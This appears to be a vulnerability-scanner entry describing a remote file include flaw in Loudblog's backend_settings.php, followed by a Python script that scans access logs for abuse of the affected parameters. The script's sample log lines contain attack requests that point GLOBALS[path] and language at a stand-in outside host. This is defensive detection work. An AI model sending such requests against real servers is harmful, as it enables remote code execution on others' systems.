Family: CGI abuses --> Category: attack
Loudblog backend_settings.php Remote File Include Vulnerability Scan
Vulnerability Scan Summary
Checks for remote file include vulnerability in Loudblog's backend_settings.php
Detailed Explanation for this Vulnerability Test
The remote web server contains a PHP script that is prone to a remote
file include vulnerability.
The remote host is running Loudblog, a PHP application for publishing
podcasts and similar media files.
The installed version of Loudblog fails to validate user input to the
'GLOBALS[path]' and 'language' parameters before using them in the
'loudblog/inc/backend_settings.php' script in a PHP 'include'
function. Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker can exploit this flaw to run arbitrary code,
possibly taken from third-party hosts, subject to the privileges of
the web server user id.
Upgrade to Loudblog 0.41 or later.
High / CVSS Base Score : 7.0
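
An added example (not part of the original advisory or of Loudblog): a detection pass over web server access logs for requests to the script and parameters named above. The log lines are constructed, and the rule for an acceptable 'language' value is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter names come from the advisory text.
SCRIPT = "loudblog/inc/backend_settings.php"
# Assumption: a legitimate 'language' value is a short token such as "en" or "de_DE".
SAFE_LANGUAGE = re.compile(r"[A-Za-z_-]{1,10}")
# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return the advisory's parameters that look abused in one request target."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(SCRIPT):
        return []
    hits = []
    # parse_qsl percent-decodes names, so GLOBALS%5Bpath%5D is caught as well.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "GLOBALS[path]":
            hits.append(name)  # never a legitimate request parameter
        elif name == "language" and not SAFE_LANGUAGE.fullmatch(value):
            hits.append(name)
    return hits


def scan(lines):
    """Yield (client, target, params) for each log line worth an analyst's attention."""
    for line in lines:
        m = REQUEST.search(line)
        params = suspicious_params(m.group(1)) if m else []
        if params:
            yield line.split(" ", 1)[0], m.group(1), params


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /loudblog/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2006:10:00:05 +0000] "GET /loudblog/inc/backend_settings.php?GLOBALS%5Bpath%5D=http://host.invalid/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [01/Jan/2006:10:00:09 +0000] "GET /loudblog/inc/backend_settings.php?language=http://host.invalid/x HTTP/1.0" 200 298',
    '192.0.2.10 - - [01/Jan/2006:10:01:00 +0000] "GET /loudblog/inc/backend_settings.php?language=en HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, target, params in scan(SAMPLE_LOG):
        print(client, params, target)
```

With 'register_globals' enabled PHP also registers POST fields and cookies, which access logs do not record, so a clean result from this pass does not replace the upgrade.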